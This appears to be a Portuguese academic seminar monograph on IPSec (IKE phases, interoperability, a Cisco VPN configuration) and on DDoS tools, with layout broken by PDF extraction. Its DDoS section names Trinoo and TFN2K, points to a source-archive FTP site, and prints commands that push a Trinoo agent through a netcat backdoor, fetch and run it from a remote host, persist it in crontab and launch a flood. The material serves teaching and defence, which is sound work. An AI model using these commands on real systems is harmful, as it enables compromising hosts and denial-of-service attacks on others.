COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Tipo do Px Payload Nenhum ( ltimo payload ) Security Association Proposta Transformao Troca de Chaves Identificao Certificado (CERT ) Pedido de Certificado Hash Assinatura Nonce Notificao Deleo ID de vendedor Reservado Uso Particular
Verso Atualmente tem valor 1. Tipo da comunicao Determina as mensagens e os payloads seguintes. Assume os seguintes valores :
33
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Tipo de Comunicao Nenhuma Base Proteo de identificao Apenas Autenticao Agressivo Informao Reservado Para uso no DOI Uso particular
Flags Indicam opes usadas na comunicao. Vide RFC2408. Identificao Usado durante a fase 2. Identifica unicamente uma mensagem Tamanho tamanho total da mensagem ( Header + Payloads )
7|8
RESERVADO (0)
15|16
DOMAIN OF INTERPRETATION ISAKMP SA ( 0 )
23|24
TAMANHO DESTE PAYLOAD
31
34
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
O significado dos campos o seguinte: Px payload Tipo do prximo payload Tamanho do payload Tamanho do payload, incluindo propostas e transformaes DOI ISAKMP identifica o DOI desta negociao . Tem valor 0 para negociaes de IKE-SA e valor 1 para IPSEC-DOI Situao Identifica a situao da negociao. Depende do DOI. 1.2) Segundo passo. ( fase1 em modo principal )
n Troca De Chaves
INICIANTE
PAYLO AD NONCE -I
RESPONDEDOR
PAYLO AD CHAVE -I HEADE R ISAKMP
HEADER ISAKMP
D PAYLOA CHAVE-R
D PAYLOA ONCE-R N
O significado dos campos o seguinte: Payload Chave Informaes necessrias para a troca de chaves ( Ex.: chaves de Diffie-Hellman Payload Nonce Dado aleatrio gerado para informar que continua a participar da negociao e para proteo contra ataques de replay No apresentarei, aqui o formato deste e dos outros pacotes. Maiores detalhes procurar na RFC2408.
35
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
1.3)
RESPONDEDOR
PAYLO AD ID-I
HEADE R ISAKM P
HEADER ISAKMP
PAYLOA ID-R
PAYLOA ASS-R
O significado dos campos o seguinte: Payload ID Identificao dos parceiros Payload CERT Um Certificado digital Payload ASS Uma assinatura digital utilizada para verificar a integridade da mensagem
36
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
O Modo Agressivo tem como proposta a realizao da fase 1 em apenas 3 mensagens, melhorando a performance do sistema, porm a segurana prejudicada. Os diagramas seguintes ilustram o modo agressivo. 2) Modo Agressivo 2.1) Primeiro passo ( fase 1 em modo agressivo )
RESPONDEDOR
PAYLOAD SA HEADER ISAKMP
HEADER ISAKMP
D PAYLOA SA
D PAYLOA CHAVE-R
D PAYLOA ONCE N
D PAYLOA -R ID
D PAYLOA SS [CERT],A
PAYLOAD ASS
PAYLOAD [CERT]
HEADER ISAKMP
37
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Aps a concluso da fase 1 , podemos iniciar a troca de dados segura entre os parceiros. Entramos, ento, na fase 2 do IKE. Na fase 2 , um dos parceiros ir solicitar a criao de uma SA AH ou uma SA ESP. Nesta solicitao ser enviado uma ou mais propostas de transformaes ( algortimos de criptografia a serem aplicados aos dados ). Os dois parceiros devem concordar em pelo menos um conjunto de algortimos para ser criada a SA. O estabelecimento desta SA realizado pela IKE-SA criada na fase 1. A fase 2 trabalha em modo rpido ( quick mode ) , apenas duas mensagens so necessrias para o estabelecimento da SA. Toda a fase 2 criptografada pois ela executada totalmente num meio seguro. A seguir apresento diagramas com as mensagens da fase 2. O formato dos campos com exemplos pode ser obtido na RFC2408. 1) Primeiro passo. ( fase 2 em Quick Mode )
INICIANTE
PAYLOA D [ID-I]
RESPONDEDOR
PAYLOA D NONCE PAYLOA D SA PAYLOA D HASH
HEADER ISAKMP
HEADER ISAKMP
D PAYLOA HASH
D PAYLOA SA
D PAYLOA ONCE N
38
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
PAYLOA D HASH
HEADER ISAKMP
39
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
4.7 APLICAES
O IPSec surge como alternativa para a vulnerabilidade do TCP/IP. Antes de seu desenvolvimento solues particulares atendiam as aplicaes isoladamente. Com o IPSec todas as aplicaes podem utilizar seus servios de segurana, pois ele implementado na camada de rede. Neste contexto, as seguintes aplicaes podem ser visualizadas para o IPSec : 1) Autenticao e/ou criptografia Fim-a-Fim Comunicao entre dois ns da INTRANET ou INTERNET que desejam autenticao e/ou confidencialidade entre os parceiros
SERVIDOR IPSec
INTERNET
INTRANET
CLIENTE IPSec
SG CLIENTE IPSec
Fig 6.
40
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
2) Autenticao e/ou criptografia Host-a-Rede N comunica-se com rede interna a partir de uma rede externa. Desejase autenticar estes usurios para que possam comunicar-se com qualquer n da rede e/ou criptografar os dados.
AUTENTICAO E / OU CRIPTOGRAFIA HOST-A-REDE
SERVIDOR
INTERNET
INTRANET
CLIENTE IPSec
SG CLIENTE
Fig 7.
41
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
3) Comunicao entre duas ou mais redes utilizando uma rede pblica como infraestrutura. Comunicao entre usurios remotos e uma LAN. Estas aplicaes, cada vez mais em voga nos dias atuais so as chamadas VPN ( Virtual Private Networks ).
SERVIDOR
CRIPTOGRAFIA REDE-A-REDE
REDE INTERNA
V P N
INTERNET
CLIENTE
SG
SERVIDOR
SG
REDE INTERNA
CLIENTE
SG
CLIENTE
Fig8.
42
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
4.8 IMPLEMENTAES
De acordo com a RFC2401, o IPSec pode ser implementado de 3 formas diferentes: 1) Integrado ao software nativo do IP Exige programao do cdigo fonte do IP. Pode ser aplicado a SG ou HOSTS 2) Entre a camada IP e os drivers da rede, soluo chamada de BITS (Bump In The Stack ) No existe necessidade de alterar o cdigo do IP, usualmente utilizado em HOSTS 3) Em um processador especial, dedicado para esta funo, soluo chamada de BITW ( Bump In The Wire ) Hardware conectado na rede que realiza as funes do IPSec. Pode dar suporte a HOSTS ou SG. Aspectos de desempenho podem influenciar entre uma forma de implementao ou outra. Sendo o IPSec uma especificao relativamente nova e de difcil compreenso, foram criados algumas organizaes que auxiliam na sua divulgao e implementao, alm de realizarem testes de conformidade e interoperabilidade. Entre esta organizaes cito : n O IPSec Developers Forum www.ip-sec.com n Virtual Private Network Consortium ( VPNC ) www.vpnc.org A tabela seguinte implementaes do IPSec. apresenta um quadro dos fabricantes com
43
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Cisco PIX with Ravlin IPSec Card 4.2 Data Fellows IBM Intel VPN + 3.0 IBM 2210 LANRover VPN 6.5
DES, Triple DES DES, Triple DES, Blow Fish, 128-bit Cast DES, Triple DES DES, Triple DES, CDMF DES, Triple DES DES, Triple DES, Blowfish, Cast DES, Triple DES
Nortel OpenBSD
No/yes No/yes
Yes/yes Yes/yes
Radguard
No/yes
No/no
3COM TimeStep
DES, Triple DES, RC5 DES, Triple DES, RC5 Blowfish, Cast, Idea
No/yes No/yes
Yes/yes Yes/yes
43
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
O VPNC realiza testes de conformidade dos produtos IPSec de seus associados emitindo inclusive certificados com os resultados. importante ressaltar que este teste no significa que dois produtos certificados iro comunicar-se. A conformidade um teste realizado em relao implementao do IPSec do OPENBSD e do KAME. O teste bsico de conformidade composto por : 1) Estabelecimento de um tnel IPSec ESP 2) Utilizao do algortimo de criptografia 3DES 3) Utilizao do algortimo de hashing SHA-1 4) Utilizao de chaves MODP ( Modular Exponetial Group ) de 1024 bits 5) Autenticao com chave manual A tabela seguinte apresenta os primeiros produtos certificados pelo teste de conformidade.
FORNECEDOR
PRODUTO
FORNECEDOR
PRODUTO
MICROSOFT
W/2000 SP1
RAPID STREAM REDCREEK COMM SSH COMM SECURITY SPRING TIDE NETWORKS CYLINK
RAPID STREAM
COSINE
IPSX 9000
RAVLIN
Hi/fn
IRE
45
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Gargalo : CPU e MEMRIA Onde : HOSTS e SG executando o IPSec Motivo : Aumento do cdigo e estruturas de dados. Processamento dos ICV, criptografia e decriptografia de cada pacote Efeito : Aumento da latncia e baixa do throughput
46
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
2)
Gargalo : CPU Onde : HOSTS e SG executando o IPSec Motivo : Processamento do IKE, especialmente usando cripitografia de chave pblica Efeito : Aumento da latncia no estabelecimento das SA. Retransmisso de dados pelas aplicaes
3)
Gargalo : BANDA PASSANTE Onde : Devices intermedirios entre os 2 nodos executando o IPSec Motivo : Aumento no tamanho do pacote ( headers ) Efeito : Aumento da banda mnima necessria para a aplicao. Aumento da fragmentao dos pacotes
47
COORDENAO DO PROGRAMA DE PS GRADUAO DA UFRJ LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
adotamos os seguintes procedimentos: 1) 2) Realizar a compresso do IP payload atravs do protocolo IPPCP ( IP Payload Compress 3) Realizar a criptografia / decriptografia em HW especfico ( INTEL 82594ED ) A RFC2401 apresenta alguns requisitos de performance do IPSec na pgina
48
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
4.10 A INTEROPERABILIDADE
A interoperabilidade diz como um produto que atende um padro comportase ao funcionar com outro compatvel com este mesmo padro. Este teste muito importante atualmente devido a grande variedade de produtos existentes no mercado. Uma mesma empresa pode possuir produtos diferentes de um mesmo padro e desejar que comuniquem-se . Com o IPSec no diferente. Organismos internacionais como o IPSec Forum e o VPNC so responsveis pela realizao destes testes. A grande importncia deste tem para a tecnologia do IPSec a sua utilizao como padro para a construo de VPN, que exige uma grande interoperabilidade por parte dos produtos, a tendncia esta exigncia tornar-se mais rgida com o uso cada vez maior das EXTRANETS. Um dos testes mais importantes realizado pelo IPSec Developers Forum, que na verdade certifica os produtos que foram aprovados no teste do ICSA (International Computer Security Association ). Atualmente na verso 1.0 A, o programa de certificao da ICSA composto pelos seguintes testes : 1) teste do IKE ( gerao da SA de controle ) 2) Criao de IPSec SA com os algortimos HMAC-SHA-1 3) Testes de durao das chaves e SA 4) Criao de tneis 5) Outros tens Apresento a seguir alguns produtos j certificados pelo ICSA. Importante observar que estes produtos so interoperveis entre si. 3DES-CBC, HMAC-MD5 e
49
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
FORNECEDOR
PRODUTO
CHECK POINT
VPN-1 SOLARIS VPN-1 W/NT VPN + 4.2 W/NT CIPRO CLIENT W/95/98/NT GAUNTLET VPN SOLARIS SAFENET W/95/98/NT
50
F-SECURE
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
INTERNET
SERVIDOR
SG2
LAN1 LAN2
SG1
CLIENTE CLIENTE
A VPN ir realizar as seguintes propostas de transformaes : Gerncia de chaves IKE, modo tnel com algortimos ESP-DES e ESP-SHA . A LAN1 utiliza na sua INTRANET o endereo 192.168.2.0/24 e a serial do SG1 com a INTERNET tem endereo 200.100.100.100. A LAN2 utiliza na sua INTRANET o endereo 192.168.3.0/24 e a serial do SG1 com a INTERNET tem endereo 205.100.100.100. Exemplificarei, aqui a configurao do SG1. Iniciamos nossa configurao criando a poltica de segurana que permita a comunicao entre as redes em questo. No IOS esta poltica de segurana criada a partir de access-list. Assim, temos:
51
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Endereo de rede origem com mscara Endereo de rede destino com mscara
Access-list 101 permit ip 192.168.2.0 0.0.0.255 192.168.3.0 0.0.0.255 Access-list 101 permit ip 192.168.3.0 0.0.0.255 192.168.2.0 0.0.0.255 Access-list 101 permit ip 200.100.100.100 0.0.0.0 205.100.100.100 0.0.0.0 Access-list 101 permit ip 205.100.100.100 0.0.0.0 200.100.100.100 0.0.0.0
Nmero da lista Endereo do SG origem com mscara Endereo do SG destino com mscara
A seguir criamos a transformao que ser aplicada aos dados que trafegarem pela VPN.
52
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Tunnel1 requisitar SA de modo tnel A seguir cria-se a VPN, define-se o protocolo de gerncia de chaves e associamos a transformao VPN. Nome da VPN Protocolo de gerncia
Crypto map VPN1 10 ipsec-isakmp Match address 101 Set transform-set tunel1 Set peer 205.100.100.100
SG2 peer na VPN1 Aplica lista 101 na VPN1
53
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Os comandos no SG2 so anlogos. Finalizamos, aqui este estudo sobre o IPSec. Devido a extenso e complexidade do assunto no foi possvel abordar todos os temas com grandes detalhes. Procurei apresentar os assuntos e conceitos bsicos para facilitar a continuao dos estudos. Iniciarei no prximo tem um tema dos mais controvertidos atualmente na INTERNET. DDoS. Discutiremos sobre Hackers, Crackers, Carders e outros ...
54
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
O DDoS
Em fevereiro de 2000, o mundo inteiro noticiou o ataque sofrido por grandes sites da INTERNET , como YAHOO, AMAZON, CNN.COM, ZDNET e outros. Um tipo de ataque j conhecido no meio de pesquisa da INTERNET foi o causador deste alvoroo, seu nome DDoS. O DOS (Denial of Service ) j era velho conhecido, porm o DDoS ( Distributed Denial of Service ) multiplicou em muito o seu poder de ataque causando grande temor e apreenso num mundo com negcios cada vez mais dependentes de segurana na INTERNET. Este trabalho pretende esclarecer o funcionamento do DDoS e apontar solues que dificultem a sua ao.
55
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
56
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
N cliente
N handler ou
... ...
master N agente
... ...
ou zumbi
vtima
Nesta rede a comunicao se d hierarquicamente na seguinte ordem : CLIENTE HANDLER AGENTE VTIMA Esta comunicao pode utilizar, inclusive, mensagens criptografadas. A rede DDoS utilizada pelo hacker para iniciar uma ataque vtima que normalmente caracteriza-se por um bombardeamento de mensagens que pode causar utilizao de 100% da banda disponvel ou tambm uma sobrecarga na cpu de um servidor. As diversas implementaes de um DDoS sero apresentadas a seguir.
57
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
algumas implementaes do DDoS, esclareo que os nomes identificam tipos de ataques e no os nomes dos programas que os implementam, porm referncias a estes nomes foram encontradas nos executveis do DDoS. 1- FUCK_THEM n n n n Handler escrito em shell script Agente escrito em C Realiza ataque com flooding ICMP echo reply Utiliza tcnicas de spoofing de endereos fonte
2- TRINOO n Todos os executveis escritos em C n Realiza ataque com flooding UDP n No faz spoofing de endereo fonte n Utiliza password para comunicao na rede DDoS n Verses mais recentes armazenam os dados criptografados n Utiliza porta 27665/TCP na comunicao CLIENTE HANDLER n Utiliza porta 27444/UDP na comunicao HANDLER AGENTE n Utiliza porta 31335/UDP na comunicao AGENTE HANDLER
3- TFN2K n n n n n n Realiza ataque com flooding UDP Realiza ataque com flooding TCP Realiza ataque com flooding ICMP echo Realiza ataque SMURF Os ataque podem ser combinados e aleatrios Comunicao na rede DDoS pode utilizar UDP/TCP/ICMP
Outras implementaes do DDoS existem e podem ser encontradas na pgina do david Dittrich ( vide referncias ) .
59
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Arquivos fonte com utilitrios DDoS podem ser encontrados via ftp na pgina INTERNET ftp://ftp.ntua.gr/pub/security/technotronic/denial , l voc achar os arquivos tfn.tgz, tfn2k.tgz, trinoo.tgz, entre outros.
60
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
Ao executar o script r na mquina de endereo dado pelo parmetro $1 , o hacker instala nesta mquina um servio que atende na porta 1524 ( vulnerabilidade do RPC) o servio ingreslock. Facilmente, a partir de uma lista com endereos de mquinas vulnerveis, o hacker pode criar um script que execute o comando acima para cada n desta lista e teremos tantos ns infectados quanto quisermos. O passo seguinte copia o programa executvel do tipo de ataque DDoS que se deseja startar a partir das mquinas agente. Para o
61
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
tipo de ataque TRINOO poderia ser o seguinte script ( este script tem o nome de trin.sh ) : echo rcp end_orig:leaf /usr/sbin/rpc.listen echo chmod +x /usr/sbin/rpc.listen echo /usr/sbin/rpc.listen echo echo \*\*\*\*\* /usr/sbin/rpc.listen>cron echo crontab cron echo exit O script acima executado na porta 1524 pelo utilitrio netcat ( nc ) em cada endereo existente numa lista dada pelo hacker. O camando poderia ser o seguinte : ./trin.sh | nc $1 1524 & Conforme pode ser visto, o trin.sh copia e starta o executvel para ser executado minuto a minuto na crontab do n agente infectado, que fica ento aguardando o comando de ataque. A instalao de um n handler no ser mostrada aqui. Aps a instalao dos exeutveis, a rede est pronta para o ataque. O clinete executa outro script que ir ordenar o handler a iniciar o ataque. Uma forma de implementao pode ser : Hacker conecta-se na aplicao do trinoo no n handler e executa comando para iniciar ataque telnet $1 27665 Ao receber o prompt do trinoo executa comando TRINOO> aaa 144adsl endereo vtima O handler j possui a lista de ns agentes a quem deve enviar o comando. Flooding UDP enviado para o endereo da vtima. O nmero de agentes e, consequentemente o nmero de mensagens ir depender do porte da vtima. O ataque se d conforme o seguinte diagrama:
62
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
AGENTE
Vtima tenta responder at esgotar seus recursos. Como o atacante envia os pacotes com endereo fonte fictcios ele no recebe as respostas e pode enviar os requests ininteruptamente, pois seus recursos no so exauridos.
? ? ?
63
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
64
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
6 CONSIDERAES FINAIS
Sem dvida o IPSec a melhor proposta de segurana que surgiu para o TCP/IP, porm seu grande pecado continua sendo a complexidade. J existem diversas implementaes do IPSec no mercado , porm persiste a dvida se so interoperveis. O grande apelo do IPSec para que ele seja o padro adotado para construo de VPNs. Existe a necessidade de ferramentas que facilitem a operao e gernia de uma VPN implementada com IPSec. Penso que podemos pensar em um sistema que seja capaz de gerar e gerenciar a VPN, definindo todos os protocolos e algortimos , a partir de uma ( ou mais ) console de gerenciamento. Sem dvida o DDoS est longe de ser banido da INTERNET. Suas caractersticas mutantes so muito difceis de combater. Precisamos de novas ferramentas que sejam adaptveis as situaes de ataque ( sistemas neurais ). Estas ferramentas precisam aprender e diferenciar modelos de trfego normal de um trfego sobre ataque. Aes devem ser tomadas durante o ataque , idias existem : linhas de backup, alterar endereo no DNS, entre outras. Penso que devemos sempre nos perguntar como o hacker poder burlar a proteo da soluo. Se no pensarmos como os hackers cairemos no erro de implantar uma soluo que logo cair por terra com um ataque novo que aparea. O campo de segurana em redes rico em material de pesquisa , lida com tecnologia de ponta e exige muito de seus pesquisadores. Espero contribuir de alguma forma para o desenvolvimento desta rea de pesquisa.
65
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
7 GLOSSRIO
AH BLOWFISH CRACKER CRIPTOGRAFIA DDoS DES DES-CBC EDI E-MAIL FTP ICV IDS IETF INTERNET IP IPSec ISAKMP MAC MTU NETCAT Authentication Header. protocolos do IPSec. Algortimo de criptografia. Atacam e destroem computadores da vtima. dados dos Um dos
Tcnica para proteo dos dados. Distributed Denial of Service. Um tipo de ataque da Internet. Data encription standard. Algortimo de criptografia. Data Encription standard, cipher block chaining Eletronic Data Interchange Electronic Mail File transfer protocol Integrity Check Value Intrusion Detection System Internet Engineering Task Force Rede Mundial de computadores Internet Protocol IP security protocol Internet Security Association and Key Management protocol Message Authentication Code Maximum Transfer of Units Utilitrio para transferncia e execuo remota de programas
66
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
remota de programas SA SAD SCANNERS SG SHA SMTP SMURF Security Association Security Association Database Realizam varredura na rede Security Gateway. Um firewall roteador executando o IPSec Secure Hashing Algorithm Simple Mail Transfer Protocol Tcnica de ataque onde a vtima atacada com mensagens vindas de um endereo de broadcast Security Policy Database Tcnica de ataque onde os endereos so trocados Secure socket language. Implementao de segurana para http Transmission Control Protocol. Protocolo de transporte com conexo do TCP/IP Arquitetura de rede da INTERNET User datagram protocol. Protocolo de transporte sem conexo do TCP/IP Virtual Private Network. ou
67
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
8 ANEXOS
1.1) AH 0 31 NEXT HEADER SECURITY 7 PAYLOAD LENGTH PARAMETER SEQUENCE NUMBER DADOS DE AUTENTICAO (TAMANHO VARIVEL ) Obs.: Comprimento em bits RESERVADO INDEX (SPI) 15
Next Header Indica o prximo protocolo da pilha ( O protocolo que vem no payload do IP ). Os seguintes protocolos so aceitos: ESP, TCP, ICMP ou UDP. Payload Length Tamanho do AH em palavras de 32 bits, menos 2. O menos 2 devido a uma compatibilidade com verses anteriores do AH. ( Vide RFC 2401 , pag 4 ). Reservado Atualmente recebe o valor zero em todos os bits.
68
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
SPI Valor de 32 bits que identifica ums AS localmente. Sequence Number Nmero que identifica cada pacote sainte do IP. Utilizado na preveno do REPLAY. Dados de Autenticao o valor do ICV (Integrity Check Value) calculado para o pacote.
69
COPPE COORDENAO DO PROGRAMA DE PS-GRADUAO DA UFRJ MESTRADO EM ENGENHARIA DE SISTEMAS LINHA DE PESQUISA REDES DE COMPUTADORES MONOGRAFIA SEMINRIO : IPSec e DDoS, ASPECTOS DE SEGURANA EM REDES TCP/IP
1.2) ESP 0 31 SECURITY PARAMETER SEQUENCE PAYLOAD PADDING TAMANHO PADDING AUTHENTICATIoN DATA Obs.: Comprimento em bits DO NEXT HEADER 7 INDEX (SPI) NUMBER DATA 15
SPI Identifica uma SA localmente na mquina Sequence Number Identica cada pacote sainte da mquina. (Usado para evitar o REPLAY) Payload Todo o payload do IP ( Header do transporte + dados) Padding - 0 a 255 bytes utilizados para, dentre outras coisas completar o tamanho do payload para atender exigncia de um protocolo de criptografia qualquer. Esta tcnica tem por objetivo dificultar programas de sniffer. Tamanho do Padding N/A
70
